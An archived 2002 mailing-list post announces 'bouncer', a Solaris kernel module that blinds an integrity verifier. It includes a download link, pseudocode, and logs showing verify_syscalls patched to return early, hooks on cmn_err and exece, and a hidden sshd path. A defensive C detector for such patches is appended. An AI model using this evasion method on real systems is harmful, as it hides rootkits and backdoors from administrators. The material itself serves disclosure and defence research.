From: noir sin (noirolympos.org)
Date: Sun Jul 07 2002 - 07:10:07 CDT


    apologies for replying to my own mail but i must say; i have successfully
    developed what i was talking about below... also fixed an alignment issue
    that leads to a crash in some rare cases.

    you can download the new package from:

    http://gsu.linux.org.tr/~noir/b.tar.gz

    >
    > primary_inhouse_kernel_function_used_by_bodyguard()
    > {
    > .....
    > if(kobj_getsymvalue(verify_syscalls,1)){
    > do page protection manipulation
    > patch the proper place with "return TRUE" of the verify_syscalls()
    > !! this will make verify_syscalls return TRUE meaning no problems
    > }
    > ....
    > do the realstuff ...
    > }
    >
    > this will render any kernel integrity level checker useless. solution
    > is simple: integrity checkers have to be stealth too, like their counterparts
    > (backdoors)

    here is how things are:
    bouncer hooks cmn_err()* and checks if verify_syscalls() resolves, if YES
    it patches the first 2 instructions of verify_syscalls with "retl; nop;"

    * cmn_err() is used for reporting to userland (through /var/adm/messages)
    so at _init() bodyguard calls cmn_err() to report its
    successful installation, nada! bouncer kicks in and patches
    verify_syscalls() ...
    ;0)

    now you can even change the sysent/sysent32 table with no worries ; )
    logs of BOUNCER in action:

    bash-2.03# uname -a
    SunOS slint 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
    bash-2.03# isainfo -b
    64
    bash-2.03# cd BOUNCER/
    bash-2.03# modload b2
    bash-2.03#
    bash-2.03# /usr/local/sbin/sshd
    bash: /usr/lib/.funky/sshd: No such file or directory
    bash-2.03# cd ../BODYGUARD
    bash-2.03# sh runbodyguard_verifier.sh
    This is the license for BodyGuard Kernel Verifier, Demo Version 1.0

    .....
    Jul 7 04:45:50 slint bodyguard: [ID 801043 kern.notice] NOTICE:
    Installing Immunity BODYGUARD module!
    Jul 7 04:45:50 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
    are any problems, please e-mail Dave Aitel at daveimmunitysec.com
    Jul 7 04:45:50 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
    just a demo version of the Immunity BODYGUARD product.
    Jul 7 04:45:50 slint bodyguard: [ID 530759 kern.notice] NOTICE: For a
    year-long site license, or limited source code license, please see
    http://www.immunitysec.com.
    Jul 7 04:45:50 slint bodyguard: [ID 222896 kern.notice] NOTICE: Done
    installing BODYGUARD.
    Jul 7 04:45:51 slint bodyguard: [ID 887483 kern.notice] NOTICE: Removing
    BODYGUARD module!
    Jul 7 05:01:22 slint bodyguard: [ID 801043 kern.notice] NOTICE:
    Installing Immunity BODYGUARD module!
    Jul 7 05:01:22 slint bodyguard: [ID 300378 kern.notice] NOTICE: If there
    are any problems, please e-mail Dave Aitel at daveimmunitysec.com
    Jul 7 05:01:22 slint bodyguard: [ID 779008 kern.notice] NOTICE: This is
    just a demo version of the Immunity BODYGUARD product.

    bash-2.03# modload bodyguard
    bash-2.03# adb -k /dev/ksyms
    physmem 3b5b
    verify_syscalls/i
    verify_syscalls:
    verify_syscalls: retl

    verify_syscalls+4: nop

    cmn_err+0x94/i
    cmn_err+0x94: call uncle_steve_albini

    exece+0xc/i
    exece+0xc: call hook_execcommon

    later,
    noir
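An added example, not part of noir's mail or of either tool: two checks a kernel verifier could run over a big-endian snapshot of its own text and of hook-prone kernel routines, built from what the adb session above shows. The first flags an entry point that has become a bare `retl; nop` stub; the second finds `call` instructions whose target lies outside the kernel's text range (the shape of the `cmn_err+0x94` and `exece+0xc` hooks). All addresses, symbol names and instruction words in the sample arrays are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SPARC_RETL 0x81c3e008u  /* jmpl %o7+8, %g0: what adb showed at verify_syscalls */
#define SPARC_RET  0x81c7e008u  /* jmpl %i7+8, %g0 */
#define SPARC_NOP  0x01000000u  /* sethi 0, %g0: the empty delay slot */

/* A function whose first instruction is a return with an empty delay slot is
 * a "return whatever is in %o0" stub, not a real verifier. */
int entry_is_return_stub(const uint32_t *code) {
    return (code[0] == SPARC_RETL || code[0] == SPARC_RET) && code[1] == SPARC_NOP;
}

/* CALL has op=01 in bits 31..30; the low 30 bits are a signed word displacement. */
int is_call(uint32_t insn) { return (insn >> 30) == 1; }

uint64_t call_target(uint64_t pc, uint32_t insn) {
    int64_t disp = insn & 0x3fffffffu;
    if (disp & 0x20000000) disp -= 0x40000000;  /* sign-extend disp30 */
    return (uint64_t)((int64_t)pc + disp * 4);
}

/* Count CALLs whose target lies outside the kernel's own text range: a hook
 * into a separately loaded module (cmn_err+0x94 in the mail) looks like this. */
size_t count_foreign_calls(const uint32_t *text, size_t nwords, uint64_t base,
                           uint64_t text_lo, uint64_t text_hi) {
    size_t hits = 0;
    for (size_t i = 0; i < nwords; i++) {
        if (!is_call(text[i])) continue;
        uint64_t t = call_target(base + i * 4, text[i]);
        if (t < text_lo || t >= text_hi) hits++;
    }
    return hits;
}

/* Constructed snapshots (not real kernel bytes): a stubbed entry, a normal
 * "save %sp,-112,%sp" prologue, and a body with one in-range and one foreign call. */
const uint32_t patched_entry[2] = { SPARC_RETL, SPARC_NOP };
const uint32_t clean_entry[2]   = { 0x9de3bf90u, SPARC_NOP };
const uint32_t body[4] = { 0x40000025u, SPARC_NOP, 0x7ffffffcu, SPARC_NOP };

int main(void) {
    printf("entry stubbed: %d\n", entry_is_return_stub(patched_entry));
    printf("foreign calls: %zu\n",
           count_foreign_calls(body, 4, 0x10000000u, 0x10000000u, 0x10001000u));
    return 0;
}
```

A checker that keeps a hash of its own entry words and of the hooked routines' text, and compares it from a code path the rootkit has not anticipated, catches both patches; hooking the reporting path alone (as bouncer does with cmn_err) does not hide a mismatch that is checked before anything is reported.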